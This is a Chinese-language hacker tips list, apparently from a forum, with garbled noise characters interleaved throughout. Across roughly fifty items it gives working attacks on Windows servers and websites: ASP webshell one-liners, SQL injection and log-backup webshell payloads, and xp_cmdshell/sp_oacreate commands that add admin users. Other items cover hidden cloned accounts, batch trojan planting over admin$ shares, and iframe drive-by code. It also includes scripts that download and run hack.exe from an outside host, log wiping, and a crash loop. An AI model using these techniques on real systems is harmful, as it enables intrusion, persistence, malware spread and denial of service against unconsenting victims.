1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
; g9 h* b$ V" [0 l6 b2 Lcacls C:\windows\system32 /G hqw20:R& Q3 ^5 f$ O% @ t* ]8 e2 j% }. O" O
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入. C# Y& u! J E" N6 Q4 h
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
+ Z* _' N H5 b3 {( d7 o# j. Z/ K6 ]9 Q; J; A
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
! Q# J; Z' L( I. q- L3 d9 T' v1 v+ C) n ?9 P
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
- M" ~! U" x& Q& g( j8 Q/ d4 c7 |0 i0 F
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 Z1 l2 l+ e) _3 G4 o( H2 i% r' G- K9 E i0 K! U) T* z* {& K
5、利用INF文件来修改注册表
8 X/ U7 ~) _( \& [# |# [; p[Version]
( E8 e) ]* J( N& hSignature="$CHICAGO$": j S$ c a) t& k0 d
[Defaultinstall]
) ]8 W2 ?' h( Y# w7 VaddREG=Ating1 z4 Q. \) z# U6 P/ C" T& s$ K
[Ating]% P+ u/ }1 Q8 f6 ^7 u6 Q/ Q8 f H
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"5 o! \' |) d7 ]' L* f
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:% b8 x& k' k+ W
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
' h$ ? S0 F+ {3 g3 S其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU! i) z9 i7 u {1 [- z* J* X' B
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% b' L7 _5 J; m* |' [HKEY_CURRENT_CONFIG 简写为 HKCC b& G. F$ D3 @; p
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值& t+ h' a' F# C* q+ D) J: B( `
"1"这里代表是写入或删除注册表键值中的具体数据. P1 Y0 S/ K2 o9 v6 ], g: }
: ^( G( t' {7 p% P( t
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,* N9 q: ]( g7 T' @6 K
多了一步就是在防火墙里添加个端口,然后导出其键值% j9 V/ a4 j' M' R1 k
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]# B' F4 j" n1 |$ X5 d; \* ~+ b1 e
1 c# v$ E9 ?$ P& O: s4 O- C3 |6 U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽* P. \- F Q. `; ?
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
6 P3 V. v, {) O0 u* _
9 Z; U6 l) C- y( G: Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。: c: A1 _0 o) U
8 W2 G. t( D0 W7 s* I) j2 b/ d9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ T" x7 k6 t- q5 _2 g可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 c) _0 g, G; |
, C8 o+ A$ `: _9 `10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
. M) Y, w0 ?8 A1 L* {& z& g
E* f! c1 J% E7 |" ]11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,0 h; [( r/ I* }+ r0 h
用法:xsniff –pass –hide –log pass.txt
" [& X1 P! _4 S$ I- Y
6 p, Y/ _+ `) v7 L* {12、google搜索的艺术! w) ^4 W/ ~9 x# v0 b* e
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
j$ L3 L+ J0 H, l0 @或“字符串的语法错误”可以找到很多sql注入漏洞。
! f) Q" x+ r% P, W, E5 M: F, D% h5 w* Y$ \4 \ o
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
- k1 \% {7 t$ Q5 {* V0 v- F, y9 B9 _+ c0 |7 c n" k2 i& |( y
14、cmd中输入 nc –vv –l –p 1987
; P4 R. _; y$ q b做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃3 C D/ M" i( T$ ]8 c, P! y4 y
1 D7 C' K& h' K( [7 p- k7 l15、制作T++木马,先写个ating.hta文件,内容为
% h2 V- t5 u, g+ B( q& V7 O<script language="VBScript">8 ~4 o8 w. y8 B
set wshshell=createobject ("wscript.shell" )/ ?+ r/ F% d9 ^5 f; J& I
a=wshshell.run("你马的名称",1)
1 x# k3 t( I9 p |/ R$ j' u/ h+ owindow.close* u. J8 ^) j( H
</script>6 Y! P6 a( Z# P, J, l R# T) L
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。% {1 g* ^. A; `! t2 Q! D+ P- P5 O s
* |; ^9 [* N# `9 I6 F+ Z
16、搜索栏里输入
3 g( w( ^ r( ?8 f# A- ~- q关键字%'and 1=1 and '%'='' t) J8 p! e# |
关键字%'and 1=2 and '%'='
- T& @* f/ {' F& [: Z# M比较不同处 可以作为注入的特征字符
6 ?( W# }6 d/ b* e8 v$ l& [" U- {, j. U+ Z( T
17、挂马代码<html>
+ C$ h% O; V6 J: m<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>4 r- `# n3 i" Y& ^ e+ J
</html>
1 F4 \1 s6 A* E3 g; g9 @# t; J& K/ |% C
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
& j, o C( h: i+ X% s jnet localgroup administrators还是可以看出Guest是管理员来。
: d4 ?1 t$ Y0 X3 k$ E; s, u7 p; @, t7 V6 s9 q! k: ~
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等- H3 c3 g9 s* s
用法: 安装: instsrv.exe 服务名称 路径
& v0 z7 W/ m" Z2 R: E7 t# ]卸载: instsrv.exe 服务名称 REMOVE
+ N' E9 o( T" ]/ D' s8 _$ O* O& ] T
& l' [" `1 G) {/ h' y) d21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
5 C4 U) s/ m8 R2 J& X$ }* w! w不能注入时要第一时间想到%5c暴库。
- u: a3 D9 W0 Z+ X* P" R. X4 F8 I& E
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
/ O. k7 M( N$ o; k9 I+ ]
: B: ]4 C% J- L2 ?23、缺少xp_cmdshell时) V; p: r: `0 ^# G
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'3 C- e$ [2 r- q; L t G
假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 G% Q: P; O5 L `) t+ pdeclare @o int
7 L6 b9 n4 I- y' gexec sp_oacreate 'wscript.shell',@o out
' h8 a8 Q' r& p7 ~; pexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
& X/ ?. `* { r( |$ M3 D' J2 L$ W: M8 |+ b: M3 H& j
24.批量种植木马.bat# j0 w8 S7 z- }% j9 J: P M- a1 K
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
! c" {1 O; r+ g7 F8 D) T8 \for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间7 @0 q8 N4 i6 y/ P1 |6 x ] O
扫描地址.txt里每个主机名一行 用\\开头
. ]% e! O6 r8 g( {$ N: c d3 ]
( g- s) m& t+ c% w25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。7 Z) }- x; W/ A. b- ^3 D- Z
2 n6 C5 P3 S" p3 H/ O% x9 s
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
9 }6 h U! Y3 J p1 b$ i8 ^% G将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: g3 b# t6 u0 d% F$ w6 s.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
2 o" b- _! n. W; |& t, t. p3 ^+ m' U+ ]; }7 R7 n0 i% w
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
r9 U, H' _$ b8 I( L然后用#clear logg和#clear line vty *删除日志
. D* D6 r. n; M& J- |
5 k9 [ q7 [4 W9 b7 v28、电脑坏了省去重新安装系统的方法# o' K2 ~; w1 P# t
纯dos下执行,( w; I; U+ ] t& R# l% _; d2 Q; B" g
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
Z9 i" W k1 g4 p2 |2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
( d- D5 A2 y) B$ {" u1 k
. f, u5 |4 V0 j* Y29、解决TCP/IP筛选 在注册表里有三处,分别是:
! c- k, O0 _, w' ZHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip* w, D* P0 \$ f% F$ `9 u+ o0 c: Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
% ?) \0 O' ] q6 P/ PHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
: f* ~! I& Y$ f/ A9 X分别用7 V* c: {; O- C5 [
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- i y& a) o' Y) Hregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) o4 a* a$ b: u d
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip# O$ o* `% I1 y3 f2 V
命令来导出注册表项
) u- } b+ \6 U4 A然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 a/ j6 g8 N4 T& q改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
' u5 @. j' J } L8 E1 M5 `/ P* gregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。+ l8 I6 h" i E
3 @1 @& A( a/ j/ p2 O
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U/ m7 ?: [5 J8 N: ~! Q
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3+ b1 ~2 {7 |- D" G
9 H" ^* S5 v8 A0 d8 u/ T31、全手工打造开3389工具9 O. l2 J+ H3 G9 l
打开记事本,编辑内容如下:
. O s5 u7 t: x" U- kecho [Components] > c:\sql" a1 K0 {9 n) y! _
echo TSEnable = on >> c:\sql
# b& S% N0 A R8 fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
3 o! h8 U9 i& D, S: R编辑好后存为BAT文件,上传至肉鸡,执行
; m; U, S/ I5 |/ O
4 C+ c% z# \2 @# h- y4 f9 Q32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马. u& \* E& j% p% ]2 [( _$ [
* G8 P+ e8 [" i7 l6 R: G3 Q
33、让服务器重启3 g' U0 \( l( `1 \
写个bat死循环:/ I1 [% f7 P0 S" n3 {) F9 V
@echo off) g3 Q- X& S- s- u+ c7 g
:loop1" X+ [. P ? P3 C# g1 _3 B; R
cls5 s- U3 w; B/ t( f9 ]
start cmd.exe
, z$ p' O( E8 ^$ y9 L" W) r3 E8 }' ~/ S, Jgoto loop1/ T' f' X% u6 u1 j& Q- E
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
5 e7 ~7 [* A/ |4 T
+ Q) J" S1 @. Z$ R/ q34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
% }2 U9 ~ R: g' Y@echo off
! U* ^( E/ c* `4 R! q8 L& |) v& r7 Tdate /t >c:/3389.txt
/ f: i/ _0 G7 f0 Y, Itime /t >>c:/3389.txt
s6 m& {' \ ~( E# M# |attrib +s +h c:/3389.bat/ ~+ |) }; u1 d4 ~
attrib +s +h c:/3389.txt
0 w- V5 t* S: Z3 V" T( i: ~netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt. _# K% f" M9 c
并保存为3389.bat
( |: z& i$ Z3 p3 j2 o6 }打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
4 l3 H' g3 H- Y2 q, k
, G* D7 Q5 [6 F35、有时候提不了权限的话,试试这个命令,在命令行里输入:
( A6 S2 L0 x8 `8 f& |start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
4 C8 a" a$ Q! l& ^; K5 f' C- V输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
& b$ Q% Z) s4 a4 t {/ G$ z8 E5 @+ B( ?. f# H* g
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
% D+ l: E' @% Z0 k; n' y; becho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址4 ?( @+ S5 k7 X# Q" l
echo 你的FTP账号 >>c:\1.bat //输入账号, }- C0 e3 K, _( n$ I' K
echo 你的FTP密码 >>c:\1.bat //输入密码
/ t0 o% S1 V% @5 P7 c9 }; iecho bin >>c:\1.bat //登入
2 r# `" K% L& @/ u5 q3 b- Hecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
8 y+ d, n& M5 G$ C2 z3 becho bye >>c:\1.bat //退出$ Y+ @; b/ Z/ T1 O
然后执行ftp -s:c:\1.bat即可
. i: T- K! |% h
/ r) x9 k5 m: q- s* X# `4 j" ?37、修改注册表开3389两法" g' r% `0 i& H$ J5 k' y& K
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
7 _ V. X8 Y7 j5 q) eecho Windows Registry Editor Version 5.00 >>3389.reg
( y- D9 H1 ~+ l b5 z5 C* Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg; M) M6 G( x8 W% |; e1 W
echo "Enabled"="0" >>3389.reg" [# h) j" ]/ {3 \. y. S! t/ Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows" {* }- _7 P* [0 ^4 d
NT\CurrentVersion\Winlogon] >>3389.reg
% `# I5 S$ G' T" G% Zecho "ShutdownWithoutLogon"="0" >>3389.reg0 U- Z* `# F4 A2 H' y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]( l- @) i) R7 l
>>3389.reg
: `$ d9 N3 |; r9 L2 k, D9 |0 becho "EnableAdminTSRemote"=dword:00000001 >>3389.reg1 p- [' E* ?& @' {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]: X9 m5 c# O6 a: i& n
>>3389.reg% X, m6 f/ c5 O3 J- s! z
echo "TSEnabled"=dword:00000001 >>3389.reg
* b2 i! ]$ i8 t/ F `' k9 Lecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg- b2 `3 ^ p8 H+ u7 w
echo "Start"=dword:00000002 >>3389.reg, |1 \* _# R4 `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]$ ^8 z. Q3 n0 n+ }, k+ l, A" O
>>3389.reg
5 Z+ F5 D* f6 kecho "Start"=dword:00000002 >>3389.reg
5 z$ ]$ G8 l* X2 @6 c1 Q' y9 ?echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg& u/ ?1 m8 D! O/ C- `
echo "Hotkey"="1" >>3389.reg
# G3 p9 d! `) X4 B+ mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ y9 _6 u6 F) N5 A6 B6 Y
Server\Wds\rdpwd\Tds\tcp] >>3389.reg- F" {# V; j7 G% g/ N$ y0 o a) D% ^
echo "PortNumber"=dword:00000D3D >>3389.reg5 K g( |, h: O+ m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- O1 | }+ z9 t1 F0 A
Server\WinStations\RDP-Tcp] >>3389.reg
$ E/ U2 K; \6 U) L8 {( e4 Gecho "PortNumber"=dword:00000D3D >>3389.reg
" Z( r# h u2 ?% O, [% N' J& D把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。3 ?0 q4 n7 N' b( {
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* b7 S/ q' i d+ H
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
2 B; C+ R" L/ p(2)winxp和win2003终端开启
: ~) E3 l6 ?: Y2 V6 P6 r7 i用以下ECHO代码写一个REG文件: ^2 d& n$ q# z. K" ]$ ]' l
echo Windows Registry Editor Version 5.00>>3389.reg
) Y7 h# {5 c( M/ \/ f% Necho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- d5 C, s8 y% M# Z
Server]>>3389.reg! }8 ^ K* g Y8 o
echo "fDenyTSConnections"=dword:00000000>>3389.reg
`: v8 i- B/ E5 @1 ~) c2 {" becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# @$ e- X- M: t* i' _4 G4 C
Server\Wds\rdpwd\Tds\tcp]>>3389.reg0 E& x. Z: U3 }# e* a
echo "PortNumber"=dword:00000d3d>>3389.reg
5 C" F" g$ t% t- c Y( Q% recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 M, [" ^! @' |" k, FServer\WinStations\RDP-Tcp]>>3389.reg
& T# K u5 U6 q2 i7 O- D' | hecho "PortNumber"=dword:00000d3d>>3389.reg, l3 j6 D! N# Y: K1 t7 p
然后regedit /s 3389.reg del 3389.reg8 J; F) |9 o; U9 O* w
XP下不论开终端还是改终端端口都不需重启
6 o: m& y: R7 s8 m: [- {/ f) H+ q$ b0 e
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
$ F% J" |& t# w! U用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
# @9 I$ T: S k [2 @- S+ k
( L( }2 \' g2 `9 g0 `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!' p2 B) r6 i1 X) ~1 a; N0 P* B
(1)数据库文件名应复杂并要有特殊字符- B, }1 r ^4 @1 X; Q+ T
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源7 `/ G) z. s: ^6 v- x2 b
将conn.asp文档中的) a6 f2 l6 u5 p- @" i# P6 w, `
DBPath = Server.MapPath("数据库.mdb")
9 y. l. A- s4 |# `: T5 Pconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath+ a* o) w+ Z* J; M8 D8 o% d* |
6 }4 f$ @$ s5 [3 }修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置$ D$ |+ ?9 @5 R7 v& c
(3)不放在WEB目录里, ?- ~! p# T- Y1 _
' A2 ]2 i/ I0 p, b5 @8 j1 O
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉& w' d, ]$ s2 r- g# O; B
可以写两个bat文件
' E% \; o2 H$ L@echo off
1 F, E8 `8 t# f h1 C% V2 `: v) p@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe/ d# h: K. y) ]* H
@del c:\winnt\system32\query.exe
/ n }5 u/ O' C0 d7 o: h8 Z@del %SYSTEMROOT%\system32\dllcache\query.exe% o) B1 R6 S" g4 r8 w
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
2 X) J" q* [% B4 k* i4 _. O, R* f. @6 G
@echo off% H2 s4 r' J) D/ p, y4 @4 A
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
: k- y- N2 Z% X% l, O9 t5 }@del c:\winnt\system32\tsadmin.exe; i+ Z* W0 ~ M ]. y! J
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) T' S6 g8 q& E( L
6 `/ n$ ]+ l! d, z% o
41、映射对方盘符
: h/ S' S' Q u" T0 y- `telnet到他的机器上,; n, x* p0 p0 y4 R5 d
net share 查看有没有默认共享 如果没有,那么就接着运行
! X2 M& d* A0 Dnet share c$=c:( C) q- [6 [& r6 c% y+ U3 w) u
net share现在有c$
3 `- i& W& w" n1 T+ x7 Q在自己的机器上运行2 X1 ^& V; |% M) b1 s7 e7 [) V8 ?
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
. ]0 x Q. r7 T$ d8 q/ \
3 Q" K, w2 i F) i; s42、一些很有用的老知识' ~/ k+ x" a9 k, k1 a
type c:\boot.ini ( 查看系统版本 )5 b3 Y4 v$ s6 ]6 F9 P% |7 C: V
net start (查看已经启动的服务)
% Q* {% d% M* }1 K7 k/ E4 ~# }+ ~% Lquery user ( 查看当前终端连接 )9 j- K5 u6 ?5 L! r3 o+ O5 T2 p
net user ( 查看当前用户 )
8 g( y% z0 V( u1 Knet user 用户 密码/add ( 建立账号 )& Z: D/ Q, y' c/ Z
net localgroup administrators 用户 /add (提升某用户为管理员)/ ^3 k' Q7 }% G0 X7 g5 D
ipconfig -all ( 查看IP什么的 )
: V7 t" O- e% ynetstat -an ( 查看当前网络状态 )" D' I/ w( Y) _2 {" ^, \- @/ d
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码) k2 y- _9 |0 B; B: L3 ~
克隆时Administrator对应1F4
6 b7 ~4 |0 g# `, cguest对应1F58 ?1 P2 i+ }7 G6 {) V
tsinternetuser对应3E8
* E# g- ]9 q+ r; B6 O$ h/ ?" _- E5 w& F4 |) L6 N3 z
43、如果对方没开3389,但是装了Remote Administrator Service4 \" G! D6 a7 f* H0 R& a
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接; U( E! V5 F! }$ V G3 T& L! k$ v
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
( Q7 L2 F' f8 u先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
, r8 Z. Y1 O4 n- O" f: n- i! f ^6 H, T7 c8 c% b" z
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
' m( P& V' E6 Z4 F1 {2 |) i本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
7 j6 Q4 o0 T1 g* E) j; q9 h0 s8 `. P6 e" W g' }
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: Y7 d/ @0 W- u/ X1 }4 Uecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
/ L6 \7 t1 O0 g3 J$ G3 w^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
+ j0 h4 N* N+ |% h; y, T1 x. SCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
* |3 S6 ]4 Y9 S1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs9 J6 J6 m# u+ d r# i3 k
(这是完整的一句话,其中没有换行符)8 v0 `8 F' s5 D Q8 ?5 h% `& [8 a5 o
然后下载:6 p' d+ T+ @1 a) G) ^( G: W
cscript down.vbs http://www.hack520.org/hack.exe hack.exe& Z0 Q( n8 R+ P- Z5 o& \7 H
/ V% F ^$ [* K# X5 K! K0 b46、一句话木马成功依赖于两个条件:' G) R) P! y3 V7 n. n7 e
1、服务端没有禁止adodb.Stream或FSO组件
/ R9 k, H' U" V7 b! f2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
! l- K @. j7 n8 _6 h7 z7 ?8 J
3 Z6 K' j0 w- U/ G( ` K$ h5 N47、利用DB_OWNER权限进行手工备份一句话木马的代码:
j& l4 d- H; j;alter database utsz set RECOVERY FULL--
/ V9 |4 C2 ~! u0 L4 x;create table cmd (a image)--
) A$ i: J! w8 f9 [;backup log utsz to disk = 'D:\cmd' with init--
' P: p q) S4 Z' c;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
& @+ e. J- B- j;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" R6 I4 h7 T0 @0 W' P# B6 i1 R
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
) g/ M" L% S( G2 K& x" n+ q% ~* K+ u
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:! T: \) E4 n( ^% e3 W. l+ h
% |% G8 G, e! B: A
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options8 L% t3 l8 I; Z, l# p w" g
所有会话用 'all'。
; O- [% T7 ~+ L" [-s sessionid 列出会话的信息。
* W9 \" Z ~0 ~) X6 `-k sessionid 终止会话。' s- ~; ?+ _6 S! U
-m sessionid 发送消息到会话。8 B; @7 k' b8 D- @+ k
1 K& Z0 ^0 E N" ?$ w. D2 B
config 配置 telnet 服务器参数。
( [1 F- c7 H8 ]) j; s: I0 n y( S
common_options 为:
5 h' V) ?* u7 [9 n9 p x5 M-u user 指定要使用其凭据的用户
( r" s- K5 W$ f-p password 用户密码
* x3 E& R$ y9 t9 a1 O) q: A- @3 i) K8 D
6 \8 E1 L, e: @ T6 hconfig_options 为:
- P- m7 D; E d1 a3 y/ O3 A* jdom = domain 设定用户的默认域
& ^* w" }% d8 F) E7 c! o# X1 wctrlakeymap = yes|no 设定 ALT 键的映射 V, s( P$ S$ [0 d% J
timeout = hh:mm:ss 设定空闲会话超时值
; f9 o) _. Z' i U5 y3 ~: M; rtimeoutactive = yes|no 启用空闲会话。
( n u6 V7 T$ g+ y3 tmaxfail = attempts 设定断开前失败的登录企图数。6 q: \8 d. T: L% N7 w0 C2 d
maxconn = connections 设定最大连接数。
+ A1 K0 X3 U1 V% q/ l3 {( w2 @port = number 设定 telnet 端口。( I6 Y. r& o2 `# l$ C0 A- E y
sec = [+/-]NTLM [+/-]passwd
/ Y( A3 J9 A& ~- |+ F设定身份验证机构! M. R4 q: W/ G2 _: R( ?4 c
fname = file 指定审计文件名。
& I* K( w3 W8 Rfsize = size 指定审计文件的最大尺寸(MB)。0 E' n% C! l. V7 }( z6 Z" ~) d8 b
mode = console|stream 指定操作模式。( P! [5 c& p, c
auditlocation = eventlog|file|both
2 c1 m2 X; t6 s0 Z: w) x指定记录地点
3 v6 u' ^+ Q0 C' e) I" j6 @audit = [+/-]user [+/-]fail [+/-]admin
7 |' @- j i" b
( c0 {8 ~$ C6 r0 g0 Y49、例如:在IE上访问:$ g) d4 x) e$ p+ i
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
5 M/ n6 U7 i1 ^ H* g/ n' yhack.txt里面的代码是:
9 X+ p8 K& y0 [) T( ^9 ~- m<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
2 L" k5 ~8 H4 A2 K K* Y把这个hack.txt发到你空间就可以了!
6 M ]& k0 T/ i8 _9 B这个可以利用来做网马哦!
4 W8 y. d4 r( Q! n
1 z$ W3 a, @$ u- g+ S50、autorun的病毒可以通过手动限制!8 W( j/ B; F$ a
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 Y9 G. I u$ q, C- v/ \1 s) s2,打开盘符用右键打开!切忌双击盘符~
Q+ [) a/ ?$ T* \/ e3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
) A) G* A. P3 K6 t2 N7 j- i/ r" H: ?
51、log备份时的一句话木马:
, g5 x# K# }. p1 }. O) M! Aa).<%%25Execute(request("go"))%%25>, K9 }8 x) y% x: v& v
b).<%Execute(request("go"))%>' |0 I0 z2 }! g2 y$ X6 k1 s
c).%><%execute request("go")%><%
7 l+ I) N: S) B( v: Y1 ^: ^d).<script language=VBScript runat=server>execute request("sb")</Script>$ ~& S7 ~$ H6 A* j7 {8 L/ e
e).<%25Execute(request("l"))%25>
" x( k2 N. D T( n: v0 Wf).<%if request("cmd")<>"" then execute request("pass")%>
) s0 c/ O' @/ V- `, K4 W
4 E) m5 r7 `: n/ B `3 h52、at "12:17" /interactive cmd
5 L$ N) g* |' N: Q执行后可以用AT命令查看新加的任务
: @( l# m$ V0 z2 Z用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
